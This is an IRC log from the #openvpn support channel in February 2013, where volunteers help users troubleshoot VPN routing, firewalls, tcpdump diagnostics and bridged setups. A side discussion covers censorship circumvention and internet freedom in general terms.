15:20 -!- merica1 [~aMERICA@75.111.74.37] has joined #openvpn 15:20 -!- merica1 [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:20 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:22 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 15:22 < pekster> merica: I'm guessing a firewall problem, but I really have no clue since the config you've shown is not a netfilter ruleset but the silly abstracted openwrt file that generates them 15:23 < pekster> I threw out both that and the UCI config for openvpn too a long time ago and run things the "proper" way with a flat config file for openvpn and iptables-restore for a clean ruleset 15:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:23 < pekster> From what I can tell, the server config looks fine assuming 192.168.121.0/24 is the VPN network and 192.168.120.0/24 is the LAN 15:23 < merica> yes 15:24 < pekster> You can ping the VPN server IP from the client end? 15:24 < pekster> 192.168.121.1 ? 15:26 < merica> no 15:27 < pekster> Then your basic connectivity isn't working. If the client doesn't get disconnected with a timeout message, then it's a firewall problem 15:27 < pekster> You need to allow traffic across the VPN adapter and have not done so 15:27 < merica> it says packet filtered actually 15:27 < merica> so 15:28 < pekster> openvpn logs, or something from your kernel/netfilter? 
15:34 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:50 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Disconnected by services] 15:51 -!- Valcorb|| is now known as Valcorb 15:53 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 15:53 -!- Rienzilla [rien@sinas.rename-it.nl] has quit [Ping timeout: 276 seconds] 15:53 -!- Rienzilla [rien@sinas.rename-it.nl] has joined #openvpn 15:56 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:57 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:58 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:00 < dropje> !factoids search routing 16:00 <@vpnHelper> No keys matched that query. 16:00 < dropje> !factoids search bridge 16:00 <@vpnHelper> 'bridge-dhcp', 'fbsdbridge', 'bridge-fw', 'bridge', and 'whybridge' 16:00 < dropje> !whybridge 16:00 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. 
or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 16:02 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 16:05 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:11 -!- merica [~aMERICA@75.111.74.37] has quit [Ping timeout: 252 seconds] 16:12 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:12 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 16:13 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:13 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:13 -!- Valcorb|| is now known as Valcorb 16:14 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 16:19 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 245 seconds] 16:20 -!- dazo is now known as dazo_afk 16:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:33 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has joined #openvpn 16:37 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has quit [Remote host closed the connection] 16:40 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:40 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:46 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:54 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:55 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 16:55 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 16:55 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 16:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 17:02 
-!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:16 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has joined #openvpn 17:18 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 17:20 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 17:22 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Quit: ZNC - http://znc.in] 17:24 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:31 -!- merica [~aMERICA@75.111.74.37] has quit [Ping timeout: 252 seconds] 17:33 -!- mezgani_ [~mezgani@41.140.40.237] has joined #openvpn 17:36 -!- p3rror [~mezgani@41.248.222.112] has quit [Ping timeout: 248 seconds] 17:38 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 17:39 -!- andi [~andi@unaffiliated/fr00d] has left #openvpn [] 17:40 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 17:40 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 17:42 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 17:45 -!- mezgani__ [~mezgani@41.249.97.201] has joined #openvpn 17:48 -!- mezgani_ [~mezgani@41.140.40.237] has quit [Ping timeout: 252 seconds] 17:48 -!- mezgani_ [~mezgani@41.140.24.197] has joined #openvpn 17:49 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has quit [Quit: p33 ba115] 17:50 -!- mezgani__ [~mezgani@41.249.97.201] has quit [Ping timeout: 260 seconds] 18:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:28 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 18:56 -!- JSharpe [~JSharpe@188.227.181.234] has quit [Quit: Leaving] 19:05 -!- mezgani_ [~mezgani@41.140.24.197] has quit [Quit: Leaving] 19:05 -!- p3rror [~mezgani@41.140.24.197] has joined #openvpn 19:09 -!- p3rror [~mezgani@41.140.24.197] has quit [Read error: Connection reset by peer] 19:11 -!- p3rror [~mezgani@41.140.24.197] has joined #openvpn 19:28 -!- merica [~aMERICA@75.111.74.37] has quit [Quit: Leaving.] 
19:39 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 19:54 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:04 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 20:05 -!- Devastator [~devas@177.99.152.50] has joined #openvpn 20:05 -!- Devastator [~devas@177.99.152.50] has quit [Changing host] 20:05 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 20:15 -!- p3rror [~mezgani@41.140.24.197] has quit [Remote host closed the connection] 20:36 -!- dolcea-xoom [~androirc@181.31.66.193] has joined #openvpn 20:37 -!- dolcea-xoom [~androirc@181.31.66.193] has left #openvpn [] 20:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:17 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn 21:18 < xkernel> I have opevpn on my VPS, I can connect to it and ping and resolve hostnames successfully but can't open websites, the browser just keep on "waiting for response", i'm using tun 21:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 21:32 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds] 21:39 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn 21:40 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has quit [Remote host closed the connection] 22:07 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Ping timeout: 248 seconds] 22:49 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 22:49 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 22:51 < roboman2444> is there a static binary? or way to make a static binary? 22:51 < roboman2444> i have been trying for a while, and i cant compile it completely static 22:56 < EugeneKay> I answered this question yesterday. 23:00 < uberushaximus> Sup EK 23:00 < EugeneKay> Very little. 
23:01 < roboman2444> EugeneKay, i musthave not noticed it 23:01 < roboman2444> and my scrollback doesnt go that far back 23:01 < roboman2444> care to copypaste? 23:01 < EugeneKay> Out of my scroll buffer 23:01 < EugeneKay> !irclogs 23:01 <@vpnHelper> "irclogs" is Channel logs are available at http://secure-computing.net/logs/#openvpn.log and http://secure-computing.net/logs/#openvpn-devel.log and are updated every three hours. 23:01 < EugeneKay> ;-) 23:03 < roboman2444> nothing there 23:03 < roboman2444> "refresh for more" 23:04 * EugeneKay blames ecrist 23:07 < roboman2444> probably 23:09 < roboman2444> anyway 23:09 < roboman2444> openvpn has a very complicated makefile system 23:09 < roboman2444> which makes it hard to get it to compile static 23:13 < uberushaximus> EugeneKay: do you know much about long range wifi networks? 23:18 < roboman2444> so EugeneKay care to ... re-say how to static compile? 23:19 < EugeneKay> Not really 23:20 < roboman2444> ...pleeeease? 23:21 < roboman2444> just a hint then? 
23:21 < EugeneKay> https://www.google.com/search?q=openvpn+compile+static 23:21 <@vpnHelper> Title: openvpn compile static - Google Search (at www.google.com) 23:22 < roboman2444> yea 23:22 < roboman2444> all those links are purple 23:22 < EugeneKay> Try #openvpn-devel 23:22 < roboman2444> k 23:25 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Quit: emmanuelux] --- Day changed Sun Feb 24 2013 00:46 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Quit: Leaving] 02:56 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 03:14 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 03:24 -!- Orbi [~opera@109.129.1.126] has joined #openvpn 03:38 -!- Orbi [~opera@109.129.1.126] has left #openvpn [] 03:38 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 03:43 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds] 03:46 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 03:51 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 264 seconds] 04:08 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 04:10 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 04:14 -!- athetius [~sollux@athetius.com] has joined #openvpn 04:24 < athetius> ios OpenVPN app is unable to connect to openvpn. The error is: EVENT: CORE_ERROR connect: No route to host [ERR]. Connection works with the same config but with a Linux laptop (on the same network), will post configs once pastebin comes back up. 
04:27 -!- catsup [~d@64.111.123.163] has quit [Remote host closed the connection] 04:31 < athetius> server.conf: http://pastie.org/6327242 04:34 < athetius> client.ovpn: http://pastie.org/6327249 04:36 < athetius> /etc/rc.local (on server): http://pastie.org/6327260 04:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 04:47 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 04:53 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:11 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 05:14 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:33 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 05:37 < pppingme> athetius from the client, can you ping the server? 05:37 < pppingme> oh, just saw your fw rules, you don't seem to allow for pings, bad bad bad... makes troubleshooting harder 05:40 -!- APTX [APTX@unaffiliated/aptx] has quit [Ping timeout: 276 seconds] 05:42 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:44 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 05:46 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [] 06:02 -!- JSharpe [~JSharpe@37.220.15.234] has joined #openvpn 06:37 -!- dsii [allan@hijacked.us] has left #openvpn [] 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:04 -!- p3rror [~mezgani@41.249.131.248] has joined #openvpn 07:04 -!- master_of_master [~master_of@p57B52F92.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 07:06 -!- master_of_master [~master_of@p57B525AE.dip.t-dialin.net] has joined #openvpn 07:11 -!- stereoit79 [~stereo@ip-78-45-42-209.net.upcbroadband.cz] has joined #openvpn 07:12 < stereoit79> hello, how do I generate server certiifcate request (with the nsCertType=server) to be signed by 
another CA? 07:15 -!- Teck7__ [~teck7@70.50.155.78] has joined #openvpn 07:18 -!- Teck7 [~teck7@bas1-montreal54-1279376358.dsl.bell.ca] has quit [Ping timeout: 256 seconds] 07:37 < dvl> stereoit79: perhaps this will help: http://www.freebsddiary.org/bacula-tls.php 07:37 -!- stereoit79 [~stereo@ip-78-45-42-209.net.upcbroadband.cz] has quit [Read error: Connection reset by peer] 07:37 <@vpnHelper> Title: The FreeBSD Diary -- Bacula - Transport Layer Security (TLS) (at www.freebsddiary.org) 07:38 < dvl> But? ummm, perhaps not. 07:39 < dvl> I've been using ssladmin for this. https://dan.langille.org/2013/01/03/ssl-admin/ 07:42 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 07:42 -!- mode/#openvpn [+v s7r] by ChanServ 08:20 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 276 seconds] 09:11 -!- APTX [APTX@unaffiliated/aptx] has joined #openvpn 09:12 -!- meepmeep [~meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 252 seconds] 09:17 -!- amir [~amir@unaffiliated/amir] has quit [Ping timeout: 264 seconds] 09:22 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has joined #openvpn 09:32 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 09:33 -!- meepmeep [meepmeep@there-is-no.endoftheinternet.org] has quit [Ping timeout: 245 seconds] 09:35 < Suterusu> Hi, How do I diagnose: Sun Feb 24 08:44:55 2013 us=367163 CBD-Orthus/81.152.141.152:35234 MULTI: bad source address from client [192.168.1.113], packet dropped -=- 'cause I've suddenly started to get a lot of them, Resulting in me being disconnected from my VPN 09:36 < Suterusu> Also, How does one set the VPN to connect automatically on disconnection - I've 'connect automatically' ticked in my network manager, doesn't appear to do the trick. Also, How do I ensure my network is piped through my VPN - ie: if it isn't going through the VPN, it doesn't leave this machine. 
09:36 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 09:37 -!- meepmeep [meepmeep@212.24.104.229] has joined #openvpn 09:38 < pekster> Suterusu: Network manages tends to do lots of things poorly, and the general recommendation is not to use it 09:38 < pekster> !keepalive 09:38 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 09:38 < pekster> And for redirection: 09:39 < pekster> !redirect 09:39 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 09:39 <@vpnHelper> http://ircpimps.org/redirect.png 09:39 < pekster> As for preventing non-VPN traffic going out, you'll need to write some firewall rules for that 09:39 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 09:41 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 09:54 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 09:55 < Suterusu> 'cause that is getting annoying 09:58 < pekster> Suterusu: OpenVPN drops traffic not associated with the IP (tun) or MAC (tap) of traffic it receives from the peer. Stop your client from sending that traffic, or if you intend to route a client-side LAN, you must use an iroute so the server is aware of the additional network 09:59 < pekster> tcpdump on the client-side on the VPN adapter and it should be very obvious what the bad traffic is. 
Then go fix it 10:01 < Suterusu> k, give it a shot - I'm not aware o anything 'additional' or 'new' tho 10:02 < Suterusu> hah - tcpdump: no suitable device found 10:02 < Suterusu> Love it when things 'just work' 10:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 10:03 < Suterusu> I takes it I does this on tun0 ? 10:14 < pekster> Yup. 'tcpdump -pni tun0' will show you all traffic on that device 10:14 < pekster> If the bad source address is consistent, you can dump on that, or dump with the filter "not host $actual_vpn_host" (set that to your VPN IP, of course) 10:15 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has joined #openvpn 10:16 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 10:20 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 10:23 < Suterusu> hmm, I just '-i' - whats the 'pn' aboot? The 'bad addy' seems consitent, yeah, And occurs in large blocks, mebbe 20-100 packets atta time 10:24 < Suterusu> ahh - yay manpages 10:24 < pekster> Indeed. You should always invoke tcpdump with -p unless you *actually* want to put the interface in promisc mode (if you don't understand that, you don't want it) 10:24 < Suterusu> hmm, don't see no lowercase p in there - whats tht? 10:24 < pekster> -pni is the same as -p -n -i 10:24 < pekster> getopts 10:25 < pekster> It's there. Use the slash key to search manpages (assuming your pager is less) 10:27 < Suterusu> hehe, That just highlighted every 'p' in the text... So the filter would be: "not host $10.8.0.6" - inc qoutes? 10:34 < pekster> No quotes 10:34 < pekster> tcpdump -pni tun not host 10.8.0.6 10:35 < pekster> The $ is a variable declaration in most shells. 
By using it I mean "replace $foo with your real-world usage here) 10:35 < pekster> And try search the manpage for the string -p 10:35 < pekster> Not just "p" 10:35 < DougEFresh> !tcp 10:35 <@vpnHelper> "tcp" is (#1) Sometimes you cannot avoid tunneling over tcp, but if you can avoid it, DO. http://sites.inka.de/~bigred/devel/tcp-tcp.html Why TCP Over TCP Is A Bad Idea. or (#2) http://www.openvpn.net/papers/BLUG-talk/14.html for a presentation by James Yonan (OpenVPN lead developer) or (#3) if you must use tcp, you likely want --tcp-nodelay 10:35 < pekster> tun0 10:43 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 10:44 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 10:59 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:00 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 11:00 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 11:05 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 11:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 11:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 11:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 11:10 -!- mode/#openvpn [+o krzee] by ChanServ 11:15 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Quit: Leaving] 11:19 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:20 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 11:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 11:26 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 11:28 <@ecrist> dvl: I always loving coming out there, but we've got lots going on at $work right now 11:30 <+s7r> i have a friend in Iran and the govt. 
there implemented at country level some kind of filter to throttle bandwidth. if they see traffic is high they reduce bandwidth from 1mbps to 64kbps making browsing impossible. 11:30 <+s7r> any way out for this? 11:31 <+s7r> openvpn, PPTP, SSTP, L2TP don't help ... not even tor 11:31 <@ecrist> no 11:31 < kisom> No. 11:32 <@ecrist> if they're monitoring bandwidth usage, that's not going to change regardless of vpn 11:34 <@krzee> you could play with multiple connections, for example what happens if you use a torrent without letting any single connection use too much bandwidth 11:35 <@krzee> of course, if that works i dont know anything to let you take advantage… 11:35 < kisom> He's gonna get his door busted by the cops if he starts torrenting in iran :) 11:35 <+s7r> i was thinking 11:35 <@krzee> theres legal torrents 11:35 <+s7r> maybe they throttle only tcp and udp .. i was thinking to make an ICMP tunnel 11:35 <+s7r> it's just a thought 11:36 < kisom> s7r: As already mentioned, they probably only count the number of packets regardless of the protocol. 11:36 < kisom> Hence it most likly wont work. 11:36 <@krzee> agreed, but may as well test 11:36 <+s7r> yeah... since it's something implemented at country level i doubt they didn't think about ICMP :) 11:36 <+s7r> but yeah, a test is worth it 11:37 <+s7r> last year they used deep package inspection to throttle all SSL connections (openvpn, https, ssh, esmtp, everything which uses ssl) 11:37 <+s7r> but you could bypass that uing obfsproxy and tor 11:37 <+s7r> obfsproxy makes ssl encrypted traffic look like innocent traffic 11:37 < pekster> You can do all sorts of crazy tunnels; IP over ICMP, or over DNS, etc, etc. However, openvpn encapsulates at thte UDP (or tcp, if using it) level. It doesn't care "how" you get that UDP data to your peer 11:38 < pekster> Openvpn will even work over RFC2549. I don't recommend it, however 11:40 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 11:42 <+s7r> i know .. 
but maybe they only filter tcp and udp packets... not icmp 11:42 <+s7r> if they filter all packets... is there any way out of this ? 11:43 < pekster> Satellite. Or my referenced carrier pigin protocol ;) 11:43 <@krzee> lol 11:43 < pekster> state-level censorship sucks 11:43 < kisom> Short wave radio 11:43 < kisom> ;) 11:43 <@krzee> or of course you could check what i said 11:44 <@krzee> and then if it helps, you could create a new type of proxy, lol 11:44 < pekster> They've got standards for exotic things like IP over DNS requests 11:44 < pekster> It's very non-trivial to set up and requires control of a domain you have access to DNS setup for (particularly for NS deligation) but it's a cool idea. Not great overhead/throughput, but it's still nifty 11:45 <@krzee> [13:34] you could play with multiple connections, for example what happens if you use a torrent without letting any single connection use too much bandwidth 11:45 <@krzee> [13:35] of course, if that works i dont know anything to let you take advantage… 11:46 < pekster> Yes, I saw that. I was answer the question about "all packets" 11:46 < dvl> ecrist: $work is very important. It allows $play. 11:46 <@krzee> boats and hoes also allow for his $play 11:46 <@krzee> :D 11:47 <@krzee> !ecrist 11:47 <@krzee> aww 11:49 <@krzee> !learn ecrist as http://www.youtube.com/watch?v=0Veqz8W98iA 11:49 <@vpnHelper> Joo got it. 11:52 <+s7r> krzee: that solution is not practical for average home users 11:52 <+s7r> they have a single connection 11:52 <@krzee> then there is no possible solution 11:52 <@krzee> i was reaching anyways 11:53 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has joined #openvpn 11:53 <@ecrist> krzee: :D 11:54 <+s7r> too bad 11:54 <+s7r> :) 11:54 <+s7r> the only solution there is to take down that state system 11:55 <+s7r> how can a normal country censorship internet? 
internet is knowledge and fast communications at global level, for news, for sharing information 11:55 <+s7r> naturally there are some bad things also on the internet but the good things prevail over the bad ones 11:55 <@krzee> they dont care about the "bad things" 11:55 <@krzee> they care about threats to the state 11:55 < pekster> Dictatorships have never liked free access to information. They'd rather censor things en-mass to stop that 11:55 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 11:56 <+s7r> yes they like to keep the population dumb 11:56 <@krzee> by dictatorship you mean strong states, right? 11:56 <+s7r> they don't want them to learn how other countries live 11:56 < pekster> Internet is just the next version of controlling the press, books, radio, etc 11:57 <@krzee> for example, china is not a dictatorship, but is a great example of a state which censors in masse 11:57 < uberushaximus> why censor when you can flood the people's minds with the irrelevant? 11:57 <@krzee> i make the distinction because america is a strong state which is trying to enact laws that will allow censorship, and i feel its important we dont give off the vibe that "it cant happen here" 11:58 <+s7r> yes you are right it's the next version of controlling the media but people already learned about it and know it should be left free 11:58 <+s7r> and they come out in the street everytime there's a threat 11:59 <@krzee> cispa is going through another attempt 11:59 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 11:59 < uberushaximus> six strikes is starting tomorrow 12:00 <@krzee> 6 strikes? 12:00 <@krzee> that's half a perfect game! 
12:02 -!- Devastator [~devas@177.18.196.4] has joined #openvpn 12:03 -!- Devastator [~devas@177.18.196.4] has quit [Changing host] 12:03 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 12:08 -!- Suterusu1 [~EyeR@host81-152-141-152.range81-152.btcentralplus.com] has quit [Ping timeout: 260 seconds] 12:10 < pekster> Sure, replace "dictatorship" with "opressive regime" if you'd like 12:11 < pekster> Things like 6-strikes is different as it's not state-level; it's cooperation between private ISPs and private interest groups. And ultimately, the prople the {MP,RI}AA are going after in fact breaking US copyright law. I'm not going to argue over if that's "right" or not as ##Politics is more appropriate for that ;) 12:12 < pekster> On a side note, I'm waiting for all these new "VPN" and "seedbox" useres to find themselves in sore lack of protection when warrants, pen-trace, and subpoenas are issued to US or "friendly" juristictions to un-mask people hiding behind what is effectively a glorified proxy 12:13 < pekster> The term "annonymous VPN" cracks me up every time since VPNs are the exact opposite of annonymous; they go through great lengths, in fact, to cryptographically verify the identity of the remote end 12:24 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 276 seconds] 12:25 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 12:26 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 256 seconds] 12:26 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 12:29 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 12:30 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 12:38 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 12:42 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 12:50 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 12:53 -!- laner 
[~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:01 < neilhwatson> I trying to set up a bridged tunnel. Following the redirect flowchart I'm led to 'is NAT enabled on VPN subnet'. The trouble is I'm not using NAT. Both client and server have public IP's. The server is assigning a public IP to the client. What could the problem be? 13:02 < neilhwatson> configs: https://gist.github.com/neilhwatson/5025038 13:02 <@vpnHelper> Title: openvpn configs (at gist.github.com) 13:04 < pekster> You can't use the same IP for the pool range as you do for your server 13:04 < pekster> Line 32 in that paste 13:05 < neilhwatson> Sorry, that was a typo in the gist, not the real configs. Corrected. 13:07 < pekster> So where are you running into problems? That setup looks fine 13:07 -!- Suterusu [~EyeR@unaffiliated/suterusu] has quit [Ping timeout: 260 seconds] 13:09 < neilhwatson> When the tunnel is up, I can ping the server from the client. I can't ping 8.8.8.8 from the client. Ip_forwarding is enabled on the server (net.ipv4.conf.eth0.forwarding = 1, net.ipv4.conf.br0.forwarding = 1, and net.ipv4.conf.tap0.forwarding = 1). 13:15 < neilhwatson> Does is matter that the server IP and the IP assigned to the client are within the same subnet? I see a warning about that in the client log. 13:17 < pekster> YOu need sysctl net.ipv4.ip_forward 13:17 < pekster> Not just for the specific intefaces 13:17 < neilhwatson> net.ipv4.ip_forward = 1 13:17 < pekster> And you can safely ignore that warning 13:18 < pekster> So, you can ping the server; that's good and expected. 
tcpdump to see where the forward traffic gets lost 13:18 < pekster> I'm guessing a firewall issue on the server 13:18 < pekster> ie: server probably sees the client request come in on tap0, but not out the external iface 13:18 -!- Suterusu [~EyeR@unaffiliated/suterusu] has joined #openvpn 13:18 < pekster> Remember too that tcpdump hooks before the netfilter stack, so you can "see" traffic you later drop (for inbound packets) 13:19 < pekster> For output, if you see it in tcpdump it'll be on the wire, assuming no hardware/NIC issues 13:19 < neilhwatson> I cleared both firewalls (shorewall clear) but the problem persisted. I'll try the dump though unless you have another idea. 13:20 < pekster> I don't use shorewall so I can't comment. Put netfilter rules somewhere if you want me to look at them, in 'iptables-save -c' syntax 13:28 < neilhwatson> I did tcpdump -i tap0 on the server, cleared ip tables, started the tunnel and pinged 8.8.8.8 from the client. The dump shows only arp requests over and over: 13:28 < neilhwatson> 14:25:21.405332 ARP, Request who-has server.example.com tell client.example.com, length 28 13:28 < neilhwatson> 14:25:21.405339 ARP, Reply server.example.com is-at 00:16:36:6f:ff:14 (oui Unknown), length 28 13:28 < pekster> Then the request isn't even getting to the server 13:28 < pekster> Client routing or fw issue it would appear 13:29 < neilhwatson> dump tap0 on client then. 13:29 < 